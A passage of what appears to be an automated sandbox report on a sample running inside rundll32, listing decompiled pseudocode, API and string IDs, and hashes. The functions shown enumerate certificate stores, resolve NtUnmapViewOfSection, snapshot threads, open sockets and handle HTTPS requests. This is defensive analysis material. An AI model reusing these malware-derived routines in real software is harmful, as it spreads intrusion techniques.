                                        0x1c33882a7bd
                                        0x1c33882a7c5
                                        0x1c33882a7d0
                                        0x1c33882a7d5
                                        0x1c33882a7df
                                        0x1c33882a7e1
                                        0x1c33882a7e7
                                        0x1c33882a7f4
                                        0x1c33882a7f6
                                        0x1c33882a7fb
                                        0x1c33882a7fd
                                        0x1c33882a802
                                        0x1c33882a808
                                        0x1c33882a80d
                                        0x1c33882a812
                                        0x1c33882a815
                                        0x1c33882a81b
                                        0x1c33882a822
                                        0x1c33882a829
                                        0x1c33882a82c
                                        0x1c33882a833
                                        0x1c33882a838
                                        0x1c33882a83e
                                        0x1c33882a840
                                        0x1c33882a845
                                        0x1c33882a84b
                                        0x1c33882a850
                                        0x1c33882a856
                                        0x1c33882a860
                                        0x1c33882a860
                                        0x1c33882a864
                                        0x1c33882a869
                                        0x1c33882a875
                                        0x1c33882a87d
                                        0x1c33882a887
                                        0x1c33882a88c
                                        0x1c33882a892
                                        0x1c33882a897
                                        0x1c33882a8a2
                                        0x1c33882a8a4
                                        0x1c33882a8ab
                                        0x1c33882a8b0
                                        0x1c33882a8b2
                                        0x1c33882a8b5
                                        0x1c33882a8bc
                                        0x1c33882a8c2
                                        0x1c33882a8ca
                                        0x1c33882a8d0
                                        0x1c33882a8d7
                                        0x1c33882a8dc
                                        0x1c33882a8de
                                        0x1c33882a8e9
                                        0x1c33882a8ec
                                        0x1c33882a8ef
                                        0x1c33882a8f7
                                        0x1c33882a8fd
                                        0x1c33882a904
                                        0x1c33882a909
                                        0x1c33882a90b
                                        0x1c33882a919
                                        0x1c33882a91c
                                        0x1c33882a92b
                                        0x1c33882a946
                                        0x1c33882a95a
                                        0x1c33882a964
                                        0x1c33882a973
                                        0x1c33882a979
                                        0x1c33882a97c
                                        0x1c33882a989
                                        0x1c33882a993
                                        0x1c33882a99e
                                        0x1c33882a9a5
                                        0x1c33882a9b4
                                        0x1c33882a9b6
                                        0x1c33882a9c8
                                        0x1c33882a9cb
                                        0x1c33882a9db
                                        0x1c33882a9e9
                                        0x1c33882aa0b
                                        0x1c33882aa15
                                        0x1c33882aa25
                                        0x1c33882aa2e
                                        0x1c33882aa33
                                        0x1c33882aa3a
                                        0x1c33882aa46
                                        0x1c33882aa48
                                        0x1c33882aa50
                                        0x1c33882aa56
                                        0x1c33882aa59
                                        0x1c33882aa60
                                        0x1c33882aa62
                                        0x1c33882aa6b
                                        0x1c33882aa74
                                        0x1c33882aa7b
                                        0x1c33882aa80
                                        0x1c33882aa85
                                        0x1c33882aa8b
                                        0x1c33882aa96
                                        0x1c33882aa98
                                        0x1c33882aaab
                                        0x1c33882aaad
                                        0x1c33882aaaf
                                        0x1c33882aab3
                                        0x1c33882aac0
                                        0x1c33882aad3
                                        0x1c33882aad8
                                        0x1c33882aae6
                                        0x1c33882aae8
                                        0x1c33882aaed
                                        0x1c33882aaf3
                                        0x1c33882aaf8
                                        0x1c33882aafe
                                        0x1c33882ab06
                                        0x1c33882ab0e
                                        0x1c33882ab15
                                        0x1c33882ab17
                                        0x1c33882ab1c
                                        0x1c33882ab1e
                                        0x1c33882ab23
                                        0x1c33882ab48

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: 85039758f41dacebd534613da7e23378369313d7fa09b1725c46ce5cfee4d8e3
                                        • Instruction ID: 96c727e8728cbf1c0e0aef463f8bce81e7e89f76a234b962a10edddc2bf06a9d
                                        • Opcode Fuzzy Hash: 85039758f41dacebd534613da7e23378369313d7fa09b1725c46ce5cfee4d8e3
                                        • Instruction Fuzzy Hash: 75C1CF322447C586FA619F15D440BEE6B91BB80BD0F66E107EEAA0B7D5CB38CA45C703
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872FB90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cert$Store$CertificatesEnum$CertificateCloseContextFreeOpen
                                        • String ID: Certificate %d$Listing certs for store %s
                                        • API String ID: 598586232-3674431298
                                        • Opcode ID: 9f3355f9253c1a9d0f375a5dbe4cc5038aeee279d3360d4d20c44a1df265f27f
                                        • Instruction ID: 972963f7baf74e54009b492c13ee4acf1b692e176b6f0782332cddb2bc2d60fa
                                        • Opcode Fuzzy Hash: 9f3355f9253c1a9d0f375a5dbe4cc5038aeee279d3360d4d20c44a1df265f27f
                                        • Instruction Fuzzy Hash: 9421B472381BC046FE559F17A9187DA6692BB49FC0F08E0269D2E0B756EE38C7468302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338718890 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 50COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E000001C31C338718890(signed int __edx, void* __eflags, void* __rcx) {
				void* _v72;
				signed char _t8;
				signed int _t10;

				_t10 = __edx & 0x00000017;
				 *(__rcx + 0x10) = _t10;
				_t8 =  *(__rcx + 0x14) & _t10;
				if (__eflags == 0) goto 0x387188b5;
				if (r8b != 0) goto 0x387188ba;
				if ((_t8 & 0x00000004) != 0) goto 0x387188c4;
				if ((_t8 & 0x00000002) != 0) goto 0x387188ef;
				goto 0x3871891a;
				return _t8;
			}






                                        0x1c338718897
                                        0x1c33871889a
                                        0x1c33871889d
                                        0x1c33871889f
                                        0x1c3387188a4
                                        0x1c3387188ad
                                        0x1c3387188b1
                                        0x1c3387188b3
                                        0x1c3387188b9

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 432778473-1866435925
                                        • Opcode ID: e2f2f8f4cb01b9a1532ecc18cf1df01b357efa897e85c791b1842b17e1414af0
                                        • Instruction ID: a6eab55d10202287d9b416dbdfbe83f2bb820ee9224ae2689a0289419938d893
                                        • Opcode Fuzzy Hash: e2f2f8f4cb01b9a1532ecc18cf1df01b357efa897e85c791b1842b17e1414af0
                                        • Instruction Fuzzy Hash: 461181312A15C651FE54EB15D896EDD2312FB90744F84F413E56A0ACA6EE3CC705C382
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871BA6C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: NtUnmapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 667068680-3998908438
                                        • Opcode ID: 6f9dc40e55cc84c4bcad7d28686e4125d510a5ef1c01b7f2f6dba7ddb1910b07
                                        • Instruction ID: faafc447c7e0dcaa43eb8fd739218276f0aec68286f5c98c6ab5e4dc67424c1d
                                        • Opcode Fuzzy Hash: 6f9dc40e55cc84c4bcad7d28686e4125d510a5ef1c01b7f2f6dba7ddb1910b07
                                        • Instruction Fuzzy Hash: B0F01D31745B8185EE05DF16F8445997760F79CFD0F48A036AE6E4B729EE3CC6858740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386F3F50 Relevance: 9.1, APIs: 6, Instructions: 135networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerSocket
                                        • String ID:
                                        • API String ID: 3979501240-0
                                        • Opcode ID: ddb4365dd0928ee9723c442f63b07f9436e9a0590a6810949821ec7c1c7811ca
                                        • Instruction ID: 5050dd0e553bdb3afc1def29d4cfabdc3b901a08b92a92ae9ede106c10219e42
                                        • Opcode Fuzzy Hash: ddb4365dd0928ee9723c442f63b07f9436e9a0590a6810949821ec7c1c7811ca
                                        • Instruction Fuzzy Hash: D1516B32A04BD18AF3208FB4A841AED7760F715378F10E716EF7916ADADB78D2948341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338717F50 Relevance: 9.1, APIs: 6, Instructions: 65threadprocessCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateOpenThread32$CloseFirstHandleInstanceNextProcessSnapshotThreadToolhelp32
                                        • String ID:
                                        • API String ID: 684471368-0
                                        • Opcode ID: 4619a8d8edc4ac160eccb4117f5135ab4275e03fabb9f83d5719aa648d199cb1
                                        • Instruction ID: 38e77b57ed9c845192f0d977dfed878949e22fc7b78f49d863f173ac7886e226
                                        • Opcode Fuzzy Hash: 4619a8d8edc4ac160eccb4117f5135ab4275e03fabb9f83d5719aa648d199cb1
                                        • Instruction Fuzzy Hash: BD218632654B848AF750CF12F444A9AB7A6F784BC0F099026EF9A47F58DF38D645CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33882BA24 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 87%
                                        			E000001C31C33882BA24(long long __rbx, signed int* __rcx, intOrPtr* __rdx, signed int __rsi, long long __rbp, void* _a8, void* _a16, void* _a24) {
				signed int _t29;
				signed int _t32;
				void* _t46;
				signed int _t49;
				void* _t54;
				signed int _t65;
				void* _t72;
				signed int _t78;
				signed int _t83;
				void* _t98;
				signed short* _t103;
				signed short* _t104;
				signed short* _t106;
				signed short* _t108;
				signed short* _t109;
				signed short* _t110;
				signed short* _t111;
				signed int* _t115;
				void* _t132;
				void* _t135;

				_t115 = __rcx;
				_t98 = _t132;
				 *((long long*)(_t98 + 8)) = __rbx;
				 *((long long*)(_t98 + 0x10)) = __rbp;
				 *((long long*)(_t98 + 0x18)) = __rsi;
				 *((long long*)(_t98 - 0x18)) = __rcx;
				asm("movsd xmm0, [eax-0x18]");
				asm("movsd [edi], xmm0");
				_t5 =  &(_t115[8]); // 0x20
				_t65 = _t5;
				__rcx[2] = 0;
				__rcx[1] =  *0x3890b288;
				if ( *__rdx != _t65) goto 0x3882ba6a;
				_t103 = __rdx + 2;
				if ( *_t103 == _t65) goto 0x3882ba61;
				_t29 =  *_t103 & 0x0000ffff;
				if (_t29 == 0x61) goto 0x3882ba95;
				if (_t29 == 0x72) goto 0x3882ba8a;
				if (_t29 != 0x77) goto 0x3882bcbd;
				 *__rcx = 0x301;
				goto 0x3882ba9b;
				 *__rcx = 0;
				__rcx[1] = 1;
				goto 0x3882baa2;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t104 =  &(_t103[1]);
				r8b = sil;
				r11b = sil;
				r9b = sil;
				r10b = sil;
				if ( *_t104 == 0) goto 0x3882bbe2;
				_t49 =  *_t104 & 0x0000ffff;
				_t72 = _t49 - 0x53;
				if (_t72 > 0) goto 0x3882bb60;
				if (_t72 == 0) goto 0x3882bb51;
				if (_t72 == 0) goto 0x3882bbce;
				if (_t72 == 0) goto 0x3882bb25;
				if (_t72 == 0) goto 0x3882bb1d;
				if (_t72 == 0) goto 0x3882bb0b;
				_t54 = _t49 - _t65 - 0xffffffffffffffe8;
				if (_t72 == 0) goto 0x3882bb02;
				if (_t54 != 4) goto 0x3882bcbd;
				if (r9b != 0) goto 0x3882bbc1;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0x3882bb58;
				asm("bts dword [edi], 0x7");
				goto 0x3882bbcc;
				if (( *__rcx & 0x00000040) != 0) goto 0x3882bbc1;
				goto 0x3882bbca;
				r10b = 1;
				goto 0x3882bbc1;
				if (r11b != 0) goto 0x3882bbc1;
				_t32 =  *__rcx;
				r11b = 1;
				if ((_t32 & 0x00000002) != 0) goto 0x3882bbc1;
				 *__rcx = _t32 & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0x3882bbcc;
				_t78 = r9b;
				if (_t78 != 0) goto 0x3882bbc1;
				 *__rcx =  *__rcx | _t65;
				r9b = 1;
				goto 0x3882bbce;
				if (_t78 == 0) goto 0x3882bbb9;
				if (_t78 == 0) goto 0x3882bbaa;
				if (_t78 == 0) goto 0x3882bb98;
				if (_t78 == 0) goto 0x3882bb8c;
				if (_t54 - 0x3a != 6) goto 0x3882bcbd;
				if (( *__rcx & 0x0000c000) != 0) goto 0x3882bbc1;
				asm("bts eax, 0xe");
				goto 0x3882bbca;
				if (r8b != 0) goto 0x3882bbc1;
				asm("btr dword [edi+0x4], 0xb");
				goto 0x3882bba2;
				if (r8b != 0) goto 0x3882bbc1;
				asm("bts dword [edi+0x4], 0xb");
				r8b = 1;
				goto 0x3882bbce;
				_t83 =  *__rcx & 0x0000c000;
				if (_t83 != 0) goto 0x3882bbc1;
				asm("bts eax, 0xf");
				goto 0x3882bbca;
				asm("bt eax, 0xc");
				if (_t83 >= 0) goto 0x3882bbc6;
				goto 0x3882bbce;
				asm("bts eax, 0xc");
				if (1 != 0) goto 0x3882bab4;
				if (r10b == 0) goto 0x3882bbeb;
				_t106 =  &(( &(_t104[__rsi]))[1]);
				if ( *_t106 == _t65) goto 0x3882bbe7;
				if (r10b != 0) goto 0x3882bc07;
				if ( *_t106 != 0) goto 0x3882bcbd;
				__rcx[2] = 1;
				goto 0x3882bccd;
				r8d = 3;
				if (E000001C31C33882D978(_t135) != 0) goto 0x3882bcbd;
				goto 0x3882bc2e;
				_t108 =  &(_t106[4]);
				if ( *_t108 == _t65) goto 0x3882bc2a;
				if ( *_t108 != 0x3d) goto 0x3882bcbd;
				_t109 =  &(_t108[1]);
				if ( *_t109 == _t65) goto 0x3882bc3d;
				r8d = 5;
				if (E000001C31C3388341D4(1, __rsi, _t109, _t135) != 0) goto 0x3882bc69;
				_t110 =  &(_t109[5]);
				asm("bts dword [edi], 0x12");
				goto 0x3882bcb3;
				r8d = 8;
				if (E000001C31C3388341D4(1, __rsi, _t110, _t135) != 0) goto 0x3882bc8c;
				_t111 =  &(_t110[8]);
				asm("bts dword [edi], 0x11");
				goto 0x3882bcb3;
				r8d = 7;
				if (E000001C31C3388341D4(1, __rsi, _t111, _t135) != 0) goto 0x3882bcbd;
				asm("bts dword [edi], 0x10");
				goto 0x3882bcb3;
				if (_t111[8] == _t65) goto 0x3882bcaf;
				goto 0x3882bbf5;
				_t46 = E000001C31C338818984(__rsi);
				 *__rsi = 0x16;
				return E000001C31C338811BC8(_t46);
			}























                                        0x1c33882ba24
                                        0x1c33882ba24
                                        0x1c33882ba27
                                        0x1c33882ba2b
                                        0x1c33882ba2f
                                        0x1c33882ba40
                                        0x1c33882ba44
                                        0x1c33882ba4f
                                        0x1c33882ba53
                                        0x1c33882ba53
                                        0x1c33882ba56
                                        0x1c33882ba59
                                        0x1c33882ba5f
                                        0x1c33882ba61
                                        0x1c33882ba68
                                        0x1c33882ba6a
                                        0x1c33882ba72
                                        0x1c33882ba77
                                        0x1c33882ba7c
                                        0x1c33882ba82
                                        0x1c33882ba88
                                        0x1c33882ba8a
                                        0x1c33882ba8c
                                        0x1c33882ba93
                                        0x1c33882ba95
                                        0x1c33882ba9b
                                        0x1c33882baa2
                                        0x1c33882baa6
                                        0x1c33882baa9
                                        0x1c33882baac
                                        0x1c33882baaf
                                        0x1c33882bab7
                                        0x1c33882babd
                                        0x1c33882bac0
                                        0x1c33882bac3
                                        0x1c33882bac9
                                        0x1c33882bad1
                                        0x1c33882bada
                                        0x1c33882badf
                                        0x1c33882bae4
                                        0x1c33882bae6
                                        0x1c33882bae9
                                        0x1c33882baee
                                        0x1c33882baf7
                                        0x1c33882bafd
                                        0x1c33882bb00
                                        0x1c33882bb02
                                        0x1c33882bb06
                                        0x1c33882bb0f
                                        0x1c33882bb18
                                        0x1c33882bb1d
                                        0x1c33882bb20
                                        0x1c33882bb28
                                        0x1c33882bb2e
                                        0x1c33882bb30
                                        0x1c33882bb35
                                        0x1c33882bb41
                                        0x1c33882bb4c
                                        0x1c33882bb4f
                                        0x1c33882bb51
                                        0x1c33882bb54
                                        0x1c33882bb56
                                        0x1c33882bb58
                                        0x1c33882bb5e
                                        0x1c33882bb63
                                        0x1c33882bb68
                                        0x1c33882bb6d
                                        0x1c33882bb72
                                        0x1c33882bb77
                                        0x1c33882bb84
                                        0x1c33882bb86
                                        0x1c33882bb8a
                                        0x1c33882bb8f
                                        0x1c33882bb91
                                        0x1c33882bb96
                                        0x1c33882bb9b
                                        0x1c33882bb9d
                                        0x1c33882bba2
                                        0x1c33882bba8
                                        0x1c33882bbac
                                        0x1c33882bbb1
                                        0x1c33882bbb3
                                        0x1c33882bbb7
                                        0x1c33882bbbb
                                        0x1c33882bbbf
                                        0x1c33882bbc4
                                        0x1c33882bbc6
                                        0x1c33882bbdc
                                        0x1c33882bbe5
                                        0x1c33882bbe7
                                        0x1c33882bbee
                                        0x1c33882bbf3
                                        0x1c33882bbf8
                                        0x1c33882bbfe
                                        0x1c33882bc02
                                        0x1c33882bc07
                                        0x1c33882bc1e
                                        0x1c33882bc28
                                        0x1c33882bc2a
                                        0x1c33882bc31
                                        0x1c33882bc37
                                        0x1c33882bc3d
                                        0x1c33882bc44
                                        0x1c33882bc46
                                        0x1c33882bc5d
                                        0x1c33882bc5f
                                        0x1c33882bc63
                                        0x1c33882bc67
                                        0x1c33882bc69
                                        0x1c33882bc80
                                        0x1c33882bc82
                                        0x1c33882bc86
                                        0x1c33882bc8a
                                        0x1c33882bc8c
                                        0x1c33882bca3
                                        0x1c33882bca9
                                        0x1c33882bcad
                                        0x1c33882bcb6
                                        0x1c33882bcb8
                                        0x1c33882bcbd
                                        0x1c33882bcc2
                                        0x1c33882bce4

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: =$UTF-16LEUNICODE$UTF-8$ccs
                                        • API String ID: 3215553584-1047608489
                                        • Opcode ID: 96cf8fe9c0719356fadf82345b90979ccc2b9001b6df5a069cf9f7b1f1e7c23e
                                        • Instruction ID: 639ce0ca1d67d3a261ebeda59cf01756370270986401c0bc008a5a554fe52b22
                                        • Opcode Fuzzy Hash: 96cf8fe9c0719356fadf82345b90979ccc2b9001b6df5a069cf9f7b1f1e7c23e
                                        • Instruction Fuzzy Hash: FC81AEB2A82280C6FB64AF2DC651BEC27A0F721744F54E817CE324F688D764CB509743
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338700750 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E000001C31C338700750(void* __rdx) {

				if (__rdx != 0) goto 0x38700762;
				return 0;
			}



                                        0x1c338700757
                                        0x1c338700761

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: vector<T> too long
                                        • API String ID: 0-3788999226
                                        • Opcode ID: 9332e477671ca40046f1949692a4c38fb21133f90a1ed4cfbdb399b7f6ad2eaa
                                        • Instruction ID: a8c0d28fa698e632b4ba7a975694a5e16b6a699849cd325dfcab5761f577a753
                                        • Opcode Fuzzy Hash: 9332e477671ca40046f1949692a4c38fb21133f90a1ed4cfbdb399b7f6ad2eaa
                                        • Instruction Fuzzy Hash: 1841CCB2751BC485EE14DB26D8087DE6261F354BB0F50A626EA7E477D5DB3CC2528300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386F9E70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E000001C31C3386F9E70(void* __rcx) {
				char _v80;
				char _v144;
				char _v232;
				long long _v240;
				long long _v248;
				char _v256;
				char _v264;
				char _v272;
				char _v280;
				void* __rbx;
				void* _t40;
				intOrPtr _t41;
				void* _t44;
				long long _t51;
				void* _t56;
				char* _t64;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;

				_v240 = 0xfffffffe;
				_t56 = __rcx;
				_t51 =  *((intOrPtr*)(__rcx + 0x70));
				_v280 = 1;
				_v272 = _t51;
				_t41 =  *((intOrPtr*)(__rcx + 0x5c));
				if (_t41 != 8) goto 0x386f9f59;
				if (_t51 == 0) goto 0x386f9f5e;
				_v264 = 0x3889d200;
				_v256 = 0x3889d200;
				_v248 = 0x3889d200;
				_v280 = "invalid request body";
				_v272 = 1;
				E000001C31C33880E0E4(__rcx,  &_v280,  &_v256, _t76, _t77);
				_v264 = 0x3889d240;
				_v264 = 0x3889d258;
				E000001C31C3387013E0(__rcx,  &_v144,  &_v264);
				 *0x1C33889D280 = "void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_constant<bool,1>)";
				 *0x1C33889D288 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/message.ipp";
				 *0x1C33889D290 = 0x172;
				E000001C31C338703440(0x3889d258,  &_v80);
				E000001C31C338703480(_t40, __rcx,  &_v232, 0x3889d258, _t77);
				_t64 =  &_v232;
				E000001C31C3388103EC(__rcx, _t64, 0x388e4690, _t77);
				if (0x3889d258 != 0) goto 0x386f9f8b;
				if ((_t64 - 0x00000004 & 0xfffffffc) != 0) goto 0x386f9f6d;
				if (_t41 != 6) goto 0x386f9f8b;
				E000001C31C338700B00(_t41, 0, _t44, 0x3889d258, _t56, _t78, _t79, _t80);
				_v280 = 0;
				E000001C31C338701170(_t40, _t44, 0x3889d258, _t56, _t56,  &_v280, _t77);
				goto 0x386f9fa2;
				E000001C31C338701170(_t40, _t44, 0x3889d258, _t56, _t56,  &_v280, _t77);
				return E000001C31C338700B00(_t41, 0, _t44, 0x3889d258, _t56, _t78, _t79, _t80);
			}
























                                        0x1c3386f9e79
                                        0x1c3386f9e82
                                        0x1c3386f9e85
                                        0x1c3386f9e89
                                        0x1c3386f9e8e
                                        0x1c3386f9e93
                                        0x1c3386f9e99
                                        0x1c3386f9ea2
                                        0x1c3386f9eaf
                                        0x1c3386f9eb6
                                        0x1c3386f9ebb
                                        0x1c3386f9ec7
                                        0x1c3386f9ecc
                                        0x1c3386f9edb
                                        0x1c3386f9ee8
                                        0x1c3386f9ef4
                                        0x1c3386f9f06
                                        0x1c3386f9f13
                                        0x1c3386f9f1e
                                        0x1c3386f9f22
                                        0x1c3386f9f34
                                        0x1c3386f9f42
                                        0x1c3386f9f4e
                                        0x1c3386f9f53
                                        0x1c3386f9f5c
                                        0x1c3386f9f66
                                        0x1c3386f9f6b
                                        0x1c3386f9f72
                                        0x1c3386f9f77
                                        0x1c3386f9f84
                                        0x1c3386f9f89
                                        0x1c3386f9f93
                                        0x1c3386f9faa

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp, xrefs: 000001C3386F9F17
                                        • void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_, xrefs: 000001C3386F9F0C
                                        • invalid request body, xrefs: 000001C3386F9EC0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp$invalid request body$void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_
                                        • API String ID: 3608347590-2849356305
                                        • Opcode ID: 15a5388d6bc62080ccf0706142a58d9206a5d28c7ffa795efbdde216f47d1515
                                        • Instruction ID: 81b085eab3825bf6868513ac38d7f53e50fc15827fef9df28aa464fd599cdf19
                                        • Opcode Fuzzy Hash: 15a5388d6bc62080ccf0706142a58d9206a5d28c7ffa795efbdde216f47d1515
                                        • Instruction Fuzzy Hash: E5319271255BC091FA60DB14E880BDAB3A5F7C9354F50A227EAAD467A5EF7CC305C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386FA220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E000001C31C3386FA220(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long __r14) {
				void* _t45;
				void* _t46;
				void* _t47;
				long long _t50;
				void* _t78;
				void* _t80;
				long long _t81;
				void* _t82;
				void* _t88;

				_t50 = _t81;
				_t80 = _t50 - 0x118;
				_t82 = _t81 - 0x210;
				 *((long long*)(_t80 - 0x78)) = 0xfffffffe;
				 *((long long*)(_t50 + 8)) = __rbx;
				 *((long long*)(_t50 + 0x10)) = __rsi;
				 *((long long*)(_t50 + 0x18)) = __rdi;
				 *((long long*)(_t50 + 0x20)) = __r14;
				asm("movaps [eax-0x18], xmm6");
				_t56 = __r8;
				_t78 = __rcx;
				r14d = 0;
				 *((intOrPtr*)(_t82 + 0x20)) = r14d;
				E000001C31C33880D880(__rcx, __rdx);
				 *((long long*)(_t82 + 0x28)) = _t50;
				E000001C31C3386FEDF0(_t47, __r8, _t78, __rdx, __rdx, __r8, _t82 + 0x20, _t88);
				if ( *((intOrPtr*)(_t82 + 0x20)) == r14d) goto 0x386fa356;
				asm("movaps xmm6, [esp+0x20]");
				 *((long long*)(_t82 + 0x40)) = 0x3889d200;
				 *((long long*)(_t82 + 0x48)) = 0x3889d200;
				 *((long long*)(_t82 + 0x50)) = 0x3889d200;
				 *((long long*)(_t82 + 0x30)) = 0x388b1da2;
				 *((char*)(_t82 + 0x38)) = 1;
				E000001C31C33880E0E4(__r8, _t82 + 0x30, _t82 + 0x48, __rdx, _t78);
				 *((long long*)(_t82 + 0x40)) = 0x3889d2a0;
				 *((long long*)(_t82 + 0x40)) = 0x388b1bc8;
				asm("movups [esp+0x58], xmm6");
				 *((long long*)(_t82 + 0x78)) = __r14;
				 *((long long*)(_t80 - 0x80)) = __r14;
				 *((long long*)(_t80 - 0x80)) = 0xf;
				 *((long long*)(_t82 + 0x78)) = __r14;
				 *((intOrPtr*)(_t82 + 0x68)) = r14b;
				E000001C31C3386FDF30(0x388b1bc8, _t56, _t80 + 0x18);
				 *0x1C3388B1C20 = "unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<char>>(class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> > &,class boost::beast::basic_flat_buffer<class std::allocator<char> > &,struct boost::beast::http::message<0,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > > &)";
				 *0x1C3388B1C28 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/read.ipp";
				 *0x1C3388B1C30 = 0x30d;
				E000001C31C338703690(0x388b1bc8, _t80 + 0x88);
				E000001C31C3386FDFB0(_t46, 0, _t56, _t80 - 0x70, 0x388b1bc8, _t78);
